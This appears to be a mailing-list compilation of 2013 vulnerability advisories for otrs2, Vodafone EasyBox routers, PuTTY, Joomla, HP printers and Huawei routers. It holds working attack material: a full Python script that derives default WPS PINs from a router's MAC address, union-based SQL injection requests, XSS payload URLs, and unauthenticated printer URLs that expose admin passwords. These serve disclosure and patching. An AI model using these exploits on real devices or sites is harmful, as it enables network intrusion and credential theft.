[SECURITY] [DSA 2733-1] otrs2 security update
Debian Security Advisory DSA-2733-1                   secur...@debian.org
http://www.debian.org/security/                       Salvatore Bonaccorso
August 02, 2013                        http://www.debian.org/security/faq

Package        : otrs2
Vulnerability  : SQL injection
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-4717

It was discovered that otrs2, the Open Ticket Request System, does not properly sanitise user-supplied data that is used on SQL queries. An attacker with a valid agent login could exploit this issue to craft SQL queries by injecting arbitrary SQL code through manipulated URLs.

For the oldstable distribution (squeeze), this problem has been fixed in version 2.4.9+dfsg1-3+squeeze4. This update also provides fixes for CVE-2012-4751, CVE-2013-2625 and CVE-2013-4088, which were all fixed for stable already.

For the stable distribution (wheezy), this problem has been fixed in version 3.1.7+dfsg1-8+deb7u3.

For the testing distribution (jessie), this problem has been fixed in version 3.2.9-1.

For the unstable distribution (sid), this problem has been fixed in version 3.2.9-1.

We recommend that you upgrade your otrs2 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
SEC Consult SA-20130805-0 :: Vodafone EasyBox Default WPS PIN Algorithm Weakness
SEC Consult Vulnerability Lab Security Advisory 20130805-0
=======================================================================
              title: Vodafone EasyBox Default WPS PIN Algorithm Weakness
            product: EasyBox 802
                     EasyBox 803
 vulnerable version: EasyBox 802 - all versions
                     EasyBox 803 - Production date before August 2011
      fixed version: EasyBox 802 - no vendor patch available
                     EasyBox 803 - Production date after August 2011
             impact: Critical
           homepage: http://www.vodafone.de
              found: 2012-12-01
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be accessed with the default WPS PIN (PIN External Registrar) printed on the back of the device.

Vulnerability overview/description:
-----------------------------------
The algorithm that generates the default WPS-PIN is entirely based on the MAC address (=BSSID) and serial number of the device. The serial number can be derived from the MAC address.

An unauthenticated attacker within the range of the access point can capture the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN for it. This PIN can then be used to retrieve the current access point configuration (including the WPA passphrase) or to change the configuration (SSID, encryption method, passphrase, ...) of the access point.

An attacker can afterwards connect to the access point and perform malicious activities such as Man-in-the-middle attacks using ARP spoofing, attack clients on the internal network, etc.
Proof of concept:
-----------------
A script that implements the derivation algorithm has been developed:

    #!/usr/bin/env python3
    # Default WPS PIN derivation for the EasyBox 802/803 (the advisory's
    # proof-of-concept script). The '&' operators and the quotes around
    # '__main__' were lost in the mailing-list rendering and are restored
    # here; the script now targets Python 3 (integer division, print()).
    import re
    import sys


    def gen_pin(mac_str, sn):
        # Single-digit integer lists: the 12 hex digits of the MAC and
        # the decimal digits of the serial number (positions 5..9).
        mac_int = [int(x, 16) for x in mac_str]
        sn_int = [0] * 5 + [int(x) for x in sn[5:]]

        hpin = [0] * 7
        k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
        k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF

        hpin[0] = k1 ^ sn_int[9]
        hpin[1] = k1 ^ sn_int[8]
        hpin[2] = k2 ^ mac_int[9]
        hpin[3] = k2 ^ mac_int[10]
        hpin[4] = mac_int[10] ^ sn_int[9]
        hpin[5] = mac_int[11] ^ sn_int[8]
        hpin[6] = k1 ^ sn_int[7]

        # Seven nibbles read as one hex number; the lower seven decimal
        # digits form the PIN body (a WPS PIN is 7 digits + checksum).
        pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2],
                                            hpin[3], hpin[4], hpin[5],
                                            hpin[6]), 16) % 10000000

        # WPS PIN Checksum - for more information see hostapd/wpa_supplicant
        # source (wps_pin_checksum) or
        # http://download.microsoft.com/download/a/f/7/afe5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
        accum = 0
        t = pin
        while t:
            accum += 3 * (t % 10)
            t //= 10
            accum += t % 10
            t //= 10
        return '%07d%d' % (pin, (10 - accum % 10) % 10)


    def main():
        if len(sys.argv) != 2:
            sys.exit('usage: easybox_wps.py [BSSID]\n'
                     '    eg. easybox_wps.py 38:22:9D:11:22:33\n')

        mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
        if len(mac_str) != 12:
            sys.exit('check MAC format!\n')

        # Serial number: 'R' followed by nine decimal digits, derived
        # from the last two octets of the MAC address.
        sn = 'R%09i' % int(mac_str[8:12], 16)
        print('derived serial number:', sn)
        print('SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (
            mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9]))
        print('WPS pin:', gen_pin(mac_str, sn))


    if __name__ == '__main__':
        main()

Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803, both produced by Arcadyan/Astoria Networks. Other devices of this vendor (including EasyBox 903) might be affected as well. Vodafone did not provide any information on this.
According to Vodafone / CERT-Bund, the following devices are vulnerable:
EasyBox 802 - all versions
EasyBox 803 - production date before August 2011

Vendor contact timeline:
------------------------
2012-12-14: Contacting Vodafone via customer support.
2013-01-09: Vodafone refers to datensch...@vodafone.com.
2013-01-10: Requesting encryption keys.
2013-01-14: Vodafone provides encryption keys.
2013-01-15: Sending advisory and proof of concept exploit via encrypted channel.
2013-01-25: Sending reminder regarding SEC Consult disclosure policy.
2013-01-25: Automatic response: Out of office until 2013-02-24.
2013-01-25: Requesting new contact person from csirt...@vodafone.com and du-de-zv-mxl-csirt...@vodafone.com.
2013-01-28: Vodafone acknowledges receipt of advisory.
2013-02-05: Vodafone confirms validity of provided information, gives information about some newer devices which are not affected, mentions that customers have already been notified to change default
PuTTY SSH handshake heap overflow
PuTTY SSH handshake heap overflow (CVE-2013-4852)

Description:
PuTTY versions 0.62 and earlier - as well as all software that integrates these versions of PuTTY - are vulnerable to an integer overflow leading to heap overflow during the SSH handshake before authentication, caused by improper bounds checking of the length parameter received from the SSH server. This allows remote attackers to cause denial of service, and may have more severe impact on the operation of software that uses PuTTY code.

Affected software products:
- PuTTY up to and including 0.62
- WinSCP before 5.1.6
- all other software that uses vulnerable (revision 9895 or earlier) PuTTY code

Details:
A malformed size value in the SSH handshake could cause an integer overflow, as the getstring() function in sshrsa.c and sshdss.c read the handshake message length without checking that it was not a negative number. Specifically, the bignum_from_bytes() function invoked by getstring() received a data buffer along with its length represented by a signed integer (nbytes) and performed the following arithmetical operation before allocating memory to store the buffer:

    w = (nbytes + BIGNUM_INT_BYTES - 1) / BIGNUM_INT_BYTES; /* bytes -> words */
    result = newbn(w);

If the value of nbytes was -1 (0xFFFFFFFF), the value of w would overflow to a very small positive number (depending on the value of BIGNUM_INT_BYTES), causing newbn() to reserve a very small memory area. Then a large number of bytes would be copied into the data buffer afterwards, resulting in a heap overflow.

Similarly, if nbytes was chosen so that w would be -1, the newbn() function would allocate zero bytes in memory via snewn() and attempt to write the size of the Bignum (in four bytes) into the allocated zero-byte area, also resulting in a heap overflow.

Consequences:
In the standalone PuTTY client the attacker does not have precise control over the memory corruption, so this bug can only cause a local denial-of-service (crash).

However, in other software that uses PuTTY code, such heap corruption could have more severe effects. Specifically in case of WinSCP, this vulnerability could potentially lead to code execution due to the exception handling employed by the program.

Solution:
This vulnerability has been fixed in the development version of PuTTY [2]. All developers using PuTTY code are recommended to use revision 9896 or later. The potential code execution vulnerability has been addressed in WinSCP 5.1.6 [3].

Credits:
This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu)

References:
[1] http://www.search-lab.hu/advisories/secadv-20130722
[2] http://svn.tartarus.org/sgt?view=revision&sortby=date&revision=9896
[3] http://winscp.net/tracker/show_bug.cgi?id=1017
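The arithmetic in the Details section above, as an added example that is not PuTTY's or WinSCP's code: it reproduces the quoted bytes-to-words computation for an assumed BIGNUM_INT_BYTES of 4, models newbn()'s sizing as the advisory describes it, and shows a checked variant that rejects negative or oversized lengths before any allocation. The function names, the word size and the sanity limit are assumptions made for the illustration.

```c
#include <stdio.h>

/* Assumed word size for this illustration; PuTTY's real BIGNUM_INT_BYTES
 * depends on the build, which is why the advisory says the small result
 * "depends on the value of BIGNUM_INT_BYTES". */
#define BIGNUM_INT_BYTES 4

/* The computation quoted in the advisory: a signed byte count received
 * from the peer is rounded up to a word count with no sign or range check. */
int words_for_bytes_unchecked(int nbytes)
{
    return (nbytes + BIGNUM_INT_BYTES - 1) / BIGNUM_INT_BYTES; /* bytes -> words */
}

/* Model (assumed, not PuTTY's code) of the sizing the advisory attributes
 * to newbn(): w + 1 words, the extra word holding the length. A w of -1
 * therefore requests zero words, the zero-byte allocation described above. */
long newbn_words_requested(int w)
{
    return (long)w + 1;
}

/* Hardened variant (assumed): validate the length before any arithmetic or
 * allocation. Returns the word count, or -1 when the length is negative or
 * exceeds a protocol sanity limit (limit value chosen for illustration). */
long words_for_bytes_checked(int nbytes)
{
    const long max_string_bytes = 1024L * 1024L;
    if (nbytes < 0)
        return -1;                 /* peer sent a "negative" length */
    if ((long)nbytes > max_string_bytes)
        return -1;                 /* refuse absurd lengths early */
    return ((long)nbytes + BIGNUM_INT_BYTES - 1) / BIGNUM_INT_BYTES;
}

int main(void)
{
    /* -7 + 3 = -4 and -4 / 4 = -1 in C, so newbn(-1) requests zero words. */
    int w = words_for_bytes_unchecked(-7);
    printf("nbytes=-7: w=%d, newbn would request %ld words\n",
           w, newbn_words_requested(w));
    /* -1 + 3 = 2 and 2 / 4 = 0 with this word size: a near-empty buffer
     * for a copy whose length the peer controls. */
    printf("nbytes=-1: w=%d\n", words_for_bytes_unchecked(-1));
    printf("checked(-1)  -> %ld (rejected)\n", words_for_bytes_checked(-1));
    printf("checked(100) -> %ld words\n", words_for_bytes_checked(100));
    return 0;
}
```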
Joomla core <= 3.1.5 reflected XSS vulnerability
- Original release date: August 05, 2013
- Discovered by: Emilio Pinna (Application Security Analyst at Abinsula)
- Contact: (emilio (dot) pinn (at) gmail (dot) com)
- Severity: 4.3/10 (Base CVSS Score)

VULNERABILITY
-------------
Joomla core package <= 3.1.5 includes a PHP script that suffers from a reflected XSS vulnerability that allows injecting HTML and malicious scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Joomla is one of the most installed CMS with dozens of millions of installations.

DESCRIPTION
-----------
Affected file libraries/idna_convert/example.php has different injection points:
- Unsanitized lang parameter in line 24
- Unsanitized file name printing on lines 112 and 119

PROOF OF CONCEPT
----------------
http://localhost/joomla/libraries/idna_convert/example.php?lang=;<script>alert(document.cookie);</script><!--

BUSINESS IMPACT
---------------
As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session that visits the maliciously crafted url.

SYSTEMS AFFECTED
----------------
Joomla-CMS <= 3.1.5

SOLUTION
--------
Fixed removing the vulnerable example file on git with commit c00c033d33d901e1ca6be9061a44e55acd041b1f

REFERENCES
----------
http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability/
https://github.com/joomla/joomla-cms/issues/1658

CREDITS
-------
Emilio Pinna (emilio (dot) pinn (at) gmail (dot) com)

DISCLOSURE TIMELINE
-------------------
August 4, 2013: Opened a ticket describing the bug by Adam Willard.
August 5, 2013: Fixed by Michael Babker.
August 5, 2013: Vulnerability disclosed by Emilio Pinna.

LEGAL NOTICES
-------------
The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise.
HP LaserJet Pro printers remote admin password extraction
Some of the networked HP LaserJet printers have hidden URLs hardcoded in the firmware. The URLs are not authenticated and can be used to extract the admin password in plaintext among other information like WiFi settings (including WPS PIN).

Models affected:
HP LaserJet Pro P1102w
HP LaserJet Pro P1606dn
HP LaserJet Pro CP1025nw
HP LaserJet Pro M1212nf MFP
HP LaserJet Pro M1213nf MFP
HP LaserJet Pro M1214nfh MFP
HP LaserJet Pro M1216nfh MFP
HP LaserJet Pro M1217nfw MFP
HP LaserJet Pro M1218nfs MFP
Possibly others(?)

URLs details:
Here are at least two interesting URLs, which can be accessed without authentication:
http://IP_ADDRESS/dev/save_restore.xml (gives admin password/configuration parameters in plaintext)
http://IP_ADDRESS:8080/IoMgmt/Adapters/wifi0/WPS/Pin (gives WPS PIN in plaintext)

Original disclosure:
http://sekurak.pl/hp-laserjet-pro-printers-remote-admin-password-extraction/

Original information from HP:
https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?javax.portlet.begCacheTok=com.vignette.cachetokenjavax.portlet.endCacheTok=com.vignette.cachetokenjavax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalState%3DdocId%253Demr_na-c03825817-1%257CdocLocale%253D%257CcalledBy%253Djavax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01ac.admitted=1375697666155.876444892.199480143

History
19.04.2013 vendor notified
19.04.2013 initial vendor response received
24.04.2013 issue confirmed
26.07.2013 new firmwares released
31.07.2013 issues summary published by vendor
02.08.2013 disclosure

-- 
Michal Sajdak, Securitum
Joomseller Events Booking Pro and JSE Event reflected XSS
-- Joomseller Events Booking Pro and JSE Event reflected XSS --

[+] Software Link:
http://www.joomseller.com/joomla-components/jse-event.html

[+] Affected Versions:
Component com_events_booking_v5
Component com_jse_event 1.0.1

[+] Vulnerability Description:
The vulnerable files are the following:
.- For JSE Event: /modules/mod_jse_mini_calendar/tmpl/tootip.php
.- For Events Booking pro: /modules/mod_eb_v5_mini_calendar/tmpl/tootip.php

The info parameter is not correctly sanitized before being used, allowing an attacker to perform XSS attacks. As a proof of concept, an attacker could perform the following request:

http://example.com/modules/mod_eb_v5_mini_calendar/tmpl/tootip.php?info=eyJldmVudHMiOiIoMTU6MDA6MDApIDxzY3JpcHQ%2BYWxlcnQoMSk7PC9zY3JpcHQ%2BIiwgImV2ZW50X2lkIjoiNjQiLCAiaXRlbWlkIjoiMSIsICJldnJfaWQiOiIxMTkxIn0%3D

where the contents of the info parameter is the following payload encoded using base64 encoding:

{"events":"(15:00:00) <script>alert(1);</script>", "event_id":"64", "itemid":"1", "evr_id":"1191"}

[+] Solution:
Upgrade to JSE Event version 1.0.1.

[+] Report Timeline:
[30/07/2013] - Vulnerability reported to the vendor
[30/07/2013] - Developer confirms vulnerability and update released
[05/08/2013] - Public disclosure

[+] Credits:
Vulnerability discovered by Gaston Traberg.
Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities
- Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities -

== Description ==
- Software link: http://stackideas.com/sectionex
- Affected versions: version 2.5.96 is vulnerable. Other versions might be affected as well.
- Author: Matias Fontanini

== Vulnerabilities ==
When using the category view, the component does not correctly sanitize the filter_order and filter_order_Dir parameters before using them to construct SQL queries, making it vulnerable to SQL Injection attacks. In order to exploit these vulnerabilities, an attacker could perform requests like the following ones:

- For the filter_order parameter:

POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y

filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1 limit 1 offset 1) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23&filter_order_Dir=DESC

- For the filter_order_Dir parameter:

POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y

filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1&filter_order_Dir=DESC limit 1 offset 1) union all (select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23

== Solution ==
Upgrade the product to the 2.5.104 version.

== Report timeline ==
[2013-07-30] Vulnerabilities reported to the developers.
[2013-07-30] Developers answered back indicating that a new release would be made soon.
[2013-08-01] SectionEx 2.5.104 was released, which fixed the issues reported.
[2013-08-05] Public disclosure.
Huawei B153 3G/UMTS router WPS weakness
Huawei B153 3G/UMTS router WPS weakness
=======================================

[ADVISORY INFORMATION]
Title:          Huawei B153 3G/UMTS router WPS weakness
Discovery date: 21/05/2013
Release date:   05/08/2013
Advisory URL:   http://blog.emaze.net/2013/08/huawei-b153-3gumts-router-wps-weakness.html
Credits:        Roberto Paleari (roberto.pale...@emaze.net, @rpaleari)
                Alessandro Di Pinto (alessandro.dipi...@emaze.net, @adipinto)

[VULNERABILITY INFORMATION]
Class: Authentication bypass

[AFFECTED PRODUCTS]
We confirm the presence of the security vulnerability on the following products/firmware versions:
* Huawei B153 3G/UMTS router, software version 1096.11.405.03.111sp02

Other device models and firmware versions are probably also vulnerable, but they were not checked.

As required by the ISP that distributes this device to end-users, we do not disclose the full commercial name of the product, but only the manufacturer device model (i.e., Huawei B153).

[VULNERABILITY DETAILS]
To allow wireless users to easily authenticate to the WPA2 Wi-Fi network, the Huawei B153 device supports the WPS protocol [1]. The WPS External Registrar PIN-based method is notoriously insecure, as it allows attackers to brute force the access PIN in a few hours [2].

In the default device configuration, the WPS daemon is configured to accept WPS PIN authentication attempts, but no WPS PIN is configured. Thus, the device is supposed to reject any possible PIN-based WPS request, allowing only the push button mechanism, which requires physical interaction.

Unfortunately we detected that, although no WPS PIN is actually configured, a specially-crafted WPS session can still force the device to complete the External Registrar handshake, returning to the attacker the current WPA2 passphrase. In other terms, attackers located within the wireless range of the device can instantly recover the WPA passphrase.

We would also like to stress that this vulnerability is present in the default device configuration, and no user action is required.

This attack cannot be exploited using publicly available tools: no standard WPS cracking tool performs handshakes using the specially-crafted WPS session required to exploit this security issue. As a consequence, we implemented our proof-of-concept as a small patch to the reaver WPS cracking tool [3] (the unmodified version of reaver *cannot* recover the password for this device).

Footnotes:
[1] http://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup
[2] http://www.kb.cert.org/vuls/id/723755
[3] https://code.google.com/p/reaver-wps/

[REMEDIATION]
Huawei has released an updated firmware version that addresses this issue.

[COPYRIGHT]
Copyright(c) Emaze Networks S.p.A 2013, All rights reserved worldwide. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

[DISCLAIMER]
Emaze Networks S.p.A is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.
Re: Joomla core <= 3.1.5 reflected XSS vulnerability
It would have been more prudent to publish this vulnerability AFTER the patch update (J! 3.1.6) is released, and not before.